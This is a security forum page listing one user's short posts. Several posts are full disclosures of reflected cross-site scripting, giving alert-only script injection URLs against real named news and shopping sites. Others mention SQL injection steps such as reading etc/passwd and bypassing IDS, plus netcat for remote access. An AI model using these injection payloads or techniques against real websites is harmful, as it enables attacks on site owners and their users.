sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Current Page: 1 of 4
Results 1 - 30 of 112
2 years ago
wireghoul
Hello, This year there is an advent calendar aimed at security - http://secadvent.com Every day for the period Dec 1-25 a security-related article will be published on the website. Today's article is a crypto type puzzle. Best of luck from the Security Advent Calendar
Forum: News and Links
5 years ago
wireghoul
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
http://www.carsguide.com.au/search/?type=all&Ntt=%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed
Forum: Full Disclosure
5 years ago
wireghoul
Did you try reading the rfc, it might help
Forum: XSS Info
5 years ago
wireghoul
Oh lol.. I borked the forum... let me urlencode that for you http://shop.three.com.au/search/searchResult.jsp?query=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert('ZOMBIES+AHEAD!')%3B%3C%2Fscript%3E%3C%26_requestid%3D542403
Forum: Full Disclosure
5 years ago
wireghoul
http://shop.three.com.au/search/searchResult.jsp?query=";</script><script>alert('ZOMBIES AHEAD!');</script><&_requestid=542403
Forum: Full Disclosure
5 years ago
wireghoul
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
@rvdh, Thanks Ronald, I'll make sure I grab it and look over it. There probably won't be any significant signature updates until version 1.6 or so as I want to extend my test suite to be able to do signature coverage first. That way I won't break anything too severely when I overhaul the signatures :)
Forum: Projects
5 years ago
wireghoul
Someone really should call rule #34 on this...
Forum: OMG Ponies
5 years ago
wireghoul
11. Graudit
Hi guys, Looking for some feedback, good or bad for graudit. You can grab the latest version from http://www.justanotherhacker.com/projects/graudit.html Cheers
Forum: Projects
5 years ago
wireghoul
Looks like he lost some files; Warning: require_once(/home/content/l/o/k/lokoutshop1/html/includes/defines.php) : failed to open stream: No such file or directory in /home/content/l/o/k/lokoutshop1/html/index.php on line 21 Fatal error: require_once() : Failed opening required '/home/content/l/o/k/lokoutshop1/html/includes/defines.php' (include_path='.:/usr/local/php5/lib/php') in /home/conten
Forum: News and Links
5 years ago
wireghoul
Good stuff! Your comments suffer from a bit of copy/paste with the goal statement, but otherwise far better than the usual run of the mill. I'd like to see some more red herrings in them, but I'm probably in the minority in that regard.
Forum: SQL and Code Injection
5 years ago
wireghoul
Netcat should do, or were you looking for a rootkit approach?
Forum: OMG Ponies
5 years ago
wireghoul
@id, that wasn't a roast, he said he likes jokes.... @marshmellowguy; welcome! grab a beer and pull up a chair, but not too close to the fire :)
Forum: Intro
5 years ago
wireghoul
You should try 4chan, they like jokes...and mudkips. Especially the mudkips!
Forum: Intro
5 years ago
wireghoul
@rvdh And so if he's injecting into a non-mysql database system....syntax'd! Granted there isn't enough evidence to assume one way or another, but I prefer to inject using SQL that isn't vendor specific whenever I can.
Forum: SQL and Code Injection
5 years ago
wireghoul
@rvdh Ok, so it might work in some version of mysql, I'm too lazy to validate that. I know postgresql chokes on it and I'd be willing to put money on oracle, sql server, access, sqlite and others will as well. The safe insert syntax is "insert into <table> column1,column2 VALUES('value1','value2');"
Forum: SQL and Code Injection
5 years ago
wireghoul
INSERT INTO email_pref SET weekly=1, email='mciske@earthlink.net' Are we mixing UPDATE SET and INSERT INTO VALUES are we?
Forum: SQL and Code Injection
5 years ago
wireghoul
So is this Turing test 2.0? I'm not that interested in AI so I'll probably just smash Eliza and www::mechanize together.
Forum: News and Links
5 years ago
wireghoul
It was test, and www.thedailywtf.com has the screenshot
Forum: News and Links
5 years ago
wireghoul
I was expecting 0x01 - Disclaimer 0x02 - Introduction 0x03 - Fuzzing 0x04 - "Order by" or "Union all select" 0x05 - Database Version & Schema_Name's 0x06 - Viewing Tables & Columns 0x07 - Pulling The Sensitive Information 0x08 - Load_File('etc/passwd') 0x09 - Into Outfile & Into DumpFile 0x0A - Bypassing IDS & IPS's 0x0B - Conclusion And your nu
Forum: SQL and Code Injection
5 years ago
wireghoul
I believe they are being painted...
Forum: OMG Ponies
5 years ago
wireghoul
24. Re: CSP
It's fail in shrinkwrap, the web is so badly written that browsers pack quirk modes, and auto correct your html causing a large number of issues, etc. IMHO we need to take a step back, label mashups as bad practice so people think twice about developing/using them (duh that will happen). Enforce compliance, if your site uses bad html then it will render unreadable and it sucks to be you. Eve
Forum: News and Links
5 years ago
wireghoul
The margin on a $8k refund for a $8k (10% of $80k) return doesn't sufficiently outweigh the cost of 3 years worth of mail forwarding in the scenario you outlined. There is also the problem of finding someone who is willing to sign their house over to you for free for 3 years so you can scam a few bucks, and each participant can only buy one house. Even as a pyramid scheme that is a far cry from r
Forum: OMG Ponies
5 years ago
wireghoul
/Slack/chan needs moar bait!
Forum: News and Links
5 years ago
wireghoul
I'm getting sick of telling you guys... You need to use HTTPS for the "secure" wiki!!!!
Forum: News and Links
5 years ago
wireghoul
You can't append a union after where in jet? (Yes, I'm too lazy to check)
Forum: SQL and Code Injection
5 years ago
wireghoul
Absinthe for the poor souls
Forum: SQL and Code Injection
5 years ago
wireghoul
What, egress filtering? You lie!
Forum: SQL and Code Injection